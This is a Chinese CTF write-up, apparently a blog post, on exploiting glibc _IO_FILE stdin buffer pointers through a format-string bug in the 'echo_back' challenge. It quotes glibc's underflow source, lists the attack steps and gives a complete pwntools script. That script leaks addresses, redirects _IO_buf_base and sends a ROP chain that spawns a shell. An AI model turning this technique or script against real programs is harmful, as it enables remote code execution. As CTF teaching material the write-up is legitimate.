针对IO的利用

最新推荐文章于 2022-03-27 21:36:34 发布
最新推荐文章于 2022-03-27 21:36:34 发布
阅读量1w 收藏
点赞数
分类专栏: Pwn CTF
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/104182669
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
CTF
22 篇文章 4 订阅
订阅专栏

简介

正常情况下我们用户的输入长度和写入位置都在受到程序限制的,不可能让用户任意地址任意长度写入;
但是利用特定的漏洞,我们可以修改到IO结构体中的指针,就可以绕过上面的那些约束从而getshell…

_IO_FILE

在结构体_IO_FILE当中有很多关键指针:
_IO_FILE
结合源码:

int
_IO_new_file_underflow (_IO_FILE *fp)
{
  _IO_ssize_t count;
#if 0
  /* SysV does not make this test; take it out for compatibility */
  if (fp->_flags & _IO_EOF_SEEN)
    return (EOF);
#endif

  if (fp->_flags & _IO_NO_READS)
    {
      fp->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;

  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer.  */
      if (fp->_IO_save_base != NULL)
	{
	  free (fp->_IO_save_base);
	  fp->_flags &= ~_IO_IN_BACKUP;
	}
      _IO_doallocbuf (fp);
    }
  if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
    {
#if 0
      _IO_flush_all_linebuffered ();
#else
      _IO_acquire_lock (_IO_stdout);

      if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
	  == (_IO_LINKED | _IO_LINE_BUF))
	_IO_OVERFLOW (_IO_stdout, EOF);

      _IO_release_lock (_IO_stdout);
#endif
    }

  _IO_switch_to_get_mode (fp);
  fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
  fp->_IO_read_end = fp->_IO_buf_base;
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
    = fp->_IO_buf_base;

  count = _IO_SYSREAD (fp, fp->_IO_buf_base,
		       fp->_IO_buf_end - fp->_IO_buf_base);
  if (count <= 0)
    {
      if (count == 0)
	fp->_flags |= _IO_EOF_SEEN;
      else
	fp->_flags |= _IO_ERR_SEEN, count = 0;
  }
  fp->_IO_read_end += count;
  if (count == 0)
    {
      fp->_offset = _IO_pos_BAD;
      return EOF;
    }
  if (fp->_offset != _IO_pos_BAD)
    _IO_pos_adjust (fp->_offset, count);
  return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)

我们可以总结出来的就是:
fp->_IO_read_ptr == fp->_IO_read_end时,通过系统调用向fp->_IO_buf_base处写入读取的数据,并且长度为fp->_IO_buf_end - fp->_IO_buf_base
所以只要我们可以控制这4个指针,那么基本就可以任意地址任意写了;

实例

这里我们以攻防世界的echo_back来看具体的应用;
程序分析:
功能
主要有2个功能,一个设置name功能,一个回显功能(有明显的格式化字符串漏洞)
通过ida分析:
main
echo
set_name
我们发现set_name只能设置一次,回显功能也要求最对输入7个长度的字符串,所以我们很难直接利用格式字符串漏洞进行攻击,因为我们只能最多写入改变4个字节的数据;
但是我们通过调试发现我们set的name会在栈上面,通过%16$p等可以访问到;
stack
这个可以想到去覆盖_IO_buf_base的值,而这个题目中可以利用是因为当覆盖为00时,指针刚好好指向了stdin内部地址,所以可以再次覆写_IO_buf_base进一步造成内存任意写,而在scanf后面跟了一个getchar()函数,每次调用这个函数是会导致_IO_read_ptr ++

思路

所以基本思路就是:

  1. 先用echo功能获得基本的地址信息(libc,pie,stack等);
  2. name设置为_IO_buf_base的地址,利用格式字符串漏洞将最低位修改为00,此时_IO_buf_base指向_IO_2_1_stdin_内部_IO_write_base的位置;
  3. 此时通过scanf输入的字符串将写入_IO_2_1_stdin_内部,所以可以再次修改_IO_buf_base的值为栈的返回地址,为之后的ROP做准备;
  4. 然后反复调用getchar()函数,即程序的echo功能,让fp->_IO_read_ptr == fp->_IO_read_end
  5. 然后我们再次调用scanf函数的时候就可以覆盖返回值了,即写入我们rop链getshell…

EXP

# -*- coding: utf-8 -*-
from pwn import *

context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

name = "./pwn"
#p = process(name)
p = remote("111.198.29.45",40705)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
libc=ELF('./libc.so.6')
if args.G:
    gdb.attach(p)

def set_name(nm):
    p.recvuntil("choice>> ")
    p.sendline("1")
    p.recvuntil("name:")
    p.send(nm)

def echo(num,data):
    p.recvuntil("choice>> ")
    p.sendline("2")
    p.recvuntil("length:")
    p.sendline(num)
    p.send(data)

echo("8","%7$p")
p.recvuntil("anonymous say:")
stack_addr = int(p.recv(14),16) 
success("stack_addr: " + hex(stack_addr))

echo("8","%14$p")
p.recvuntil("anonymous say:")
pro_addr = int(p.recv(14),16) - 0xd30
success("pro_addr: " + hex(pro_addr))

echo("8","%19$p")
p.recvuntil("anonymous say:")
libc_addr = int(p.recv(14),16) - 0x020830 
stdin_addr = libc_addr + 0x3c48e0 
io_write_addr = libc_addr + 0x3c4963
system_addr = libc_addr + 0x045390 
bin_sh = libc_addr + 0x18cd57 
set_name(p64(stdin_addr + 7*8)[:-1])
echo("8","%16$hhn")

pay = p64(io_write_addr)*3 + p64(stack_addr-0x18) + p64(stack_addr-0x18 + 0x64)
p.sendlineafter('choice>>','2')  
p.recvuntil("length:")
p.send(pay)
sleep(1)
p.sendline("")

for i in range(len(pay)-1):
    p.recvuntil("choice>> ")
    p.sendline("2")
    p.recvuntil("length:")
    p.sendline(str(i))

sleep(1)
p.recvuntil("choice>> ")
p.sendline("2")
p.recvuntil("length:")
pay1 = p64(pro_addr + 0xd93) + p64(bin_sh) + p64(system_addr)
p.send(pay1)
p.sendline('')
p.interactive()

总结

pwndbg> p _IO_2_1_stdin_

pwndbg> p stdin         
$4 = (_IO_FILE *) 0x7ffff7b848e0 <_IO_2_1_stdin_>
pwndbg> p *(struct _IO_FILE *) 0x7ffff7b848e0

可以查看到结构体的内容,更方便;

钞sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
嵌入式文件IO的运用
INaivety的博客
04-13 257
标题 通过文件IO重写cp复制命令 . // An highlighted block`在这里插入代码片` var foo = 'bar'; `` ## 生成一个适合你的列表 - 项目 - 项目 - 项目 1. 项目1 2. 项目2 3. 项目3 - [ ] 计划任务 - [x] 完成任务 ## 创建一个表格 一个简单的表格是这么创建的: 项目 | Value ---...
标准io例子linux,标准IO 中对文件的基本操作
weixin_35851482的博客
05-14 178
对于Linux程序员来说,对文件的IO操作是应用编程的基础内容,也是必须掌握的技能;下面作者通过两个基本概念和四个函数,来解析对文件的基本操作;首先要明白两个基本的概念;文件和IO;1.文件:文件指的是同类型数据的集合; 在linux中有一个重要思想;一切皆文件;也是说在Linux系统中把所有的文件、设备、内存等都当做文件来看待;因为这个思想的存在,所有在Linux系统中对设备及文件的操作方式都是...
pwn的五道基础题
lllwky的博客
03-27 6757
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
pwntools语句的简单使用,包含例子
半岛铁盒的博客
12-17 2805
from pwn import * #io = process("./int_overflow") io = remote("远程链接ip",端口) flag_addr = 需要覆盖的flag地址如0x804868B offset = 0x14 + 0x4 io.sendlineafter("Your choice:","1") io.sendlineafter("username:","aaa") payload = b"A"*offset + p32(flag_addr) + b"A"*(260 - o
_IO 变量的作用
qrfdt的博客
08-26 7520
什么是_IO变量: _IO为volatile变量,volatile 影响编译器编译的结果, 指出:volatile 变量是随时可能发生变化的,与volatile变量有关的运算,不要进行编译优化,以免出错。 volatile(即__IO) 告诉编译器变量是随时可能发生变化的,每次使用它的时候必须从变量的地址中读取,因而编译器生成的可执行码会重新变量的地址读取数据。而如果没有使用__IO,编译器优化做法是,由于编译器发现两次从i中读数据的代码之间的代码没有对i进行过操作,它会自动把上次读的数据放在k中,而不是重
weapp.socket.io
04-21
"weapp.socket.io"是一个专为微信小程序(WeChat Mini Program)定制的Socket.IO实现,它使得在微信环境中可以利用WebSocket进行实时通信。Socket.IO是一个流行的JavaScript库,它提供了跨平台、跨浏览器的实时应用...
利用串行RapidIO实现FPGA协处理
01-19
 同时,开发人员不但要跟上日益提高的性能需求,还得注意保持成本低廉有效利用基于串行RapidIO的FPGA作为DSP协处理器就能达到这些目的。  由于三重播放应用集合了话音、视频和数据应用,因此必须采用新算法来设定...
安川机器人IO手册
10-24
安川电机株式会社发布的**DX200并行I/O说明书**,是针对其最新机器人控制柜DX200的详细指导文档。该文档主要面向最终用户,目的是确保用户能够正确理解和操作DX200的并行输入/输出功能。通过阅读此说明书,用户可以...
Scalable IO in Java
09-09
通过将IO操作分散到多个线程,可以充分利用多核处理器的优势,提高处理速度。ExecutorService和Future接口提供了管理线程池和控制任务执行的能力。 5. **选择器与多路复用** Java的Selector允许一个线程同时监控多...
IOAPI解决方案.doc
最新发布
01-25
IOAPI解决方案是针对IT运维分析领域的一个创新方法,旨在帮助企业应对日益增长的运维数据处理挑战。随着企业网络规模的扩大,每天都会产生大量的运维数据,达到TB级别,这使得传统分析技术如标准阈值设置面临困难,...
STM32 keil中__IO得意思
QWQ_DIODA的博客
05-12 6369
__IO解释 STM32得库函数中(HAL和LL库都有),存在一个__IO得宏定义 #define __I volatile const /*!< defines 'read only' permissions */ #define __O volatile /*!< defines 'write only' permissions */ #define __IO volati
关于STM32 __IO 的变量定义
wangzi201368的博客
07-29 3255
这个_IO 是指静态 这个 _IO 是指静态 volatile uint32_t 是指32位的无符号整形变量uint32_t 是指32位的无符号整形变量; 搞stm32这么久了,经常看到stm32里面库文件里面有用“_IO”定义的变量,查过一下当时记住了,过段时间又给忘记了。所以才特意的写一个博文来记住。 volatile volatile 类型是这样的,其数据确实可能在未知的情况下发生变...
1 io口 stm32_STM32随录-1: __I、 __O 、__IO是什么意思?
weixin_39932838的博客
12-13 766
大家好,我是攻城的鼎!这是ST库里面的宏定义,定义如下:#define __I volatile const /*!< defines 'read only' permissions */#define __O volatile /*!< defines 'write only' permissions */#define __IO volatile /*!< defines '...
嵌入式编程(以STM32为例)中的volatile,const意义及应用场景
热门推荐
zjgtan的专栏
06-28 1万+
__I、 __O 、__IO是什么意思? 这是ST库里面的宏定义,定义如下: #define     __I       volatile const        /*! #define     __O       volatile                  /*! #define     __IO      volatile                  /*!
__I、 __O 、__IO是什么意思?
qianshanxue11的博客
05-21 527
__I、 __O 、__IO是什么意思?  这是ST库里面的宏定义,定义如下: #define __I volatile const /*! #define __O volatile /*! #define __IO volatile /*! 显然,这三个宏定义都是用来替换成 volatile 和 const 的,所以我们先要了解 这两个关键字的作用:  volatil
编程进阶,学会使用_I、_O、_IO,以及volatile const的意义
qlexcel的专栏
04-09 703
_I、_O、_IO在ST库里面的定义是: #define __I volatile const /*!< defines 'read only' permissions */ #define __O volatile /*!< defines 'write only' permissions */ #define __IO volatile /*!< defines 're...
__IO就是volatile的宏定义新名字,#define __IO volatile
jxndsfss的专栏
10-15 2056
使用__IO修饰变量时,则不从cache读取值,而是从变量地址处读取值,防止因其他地方(如硬件引脚、程序其他地方)修改变量值后导致读取变量值不准确的问题。 ...
嵌入式C语言中的__I,__O,__IO
grin2的博客
04-28 3278
转载
__I、 __O 、__IO是什么意思?怎么用?
qixiantong_123的专栏
02-17 412
原帖地址:http://www.amobbs.com/thread-5220221-1-1.html _I、 __O 、__IO是什么意思? 这是ST库里面的宏定义,定义如下: #define     __I       volatile const         #define     __O       volatile                   #def
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值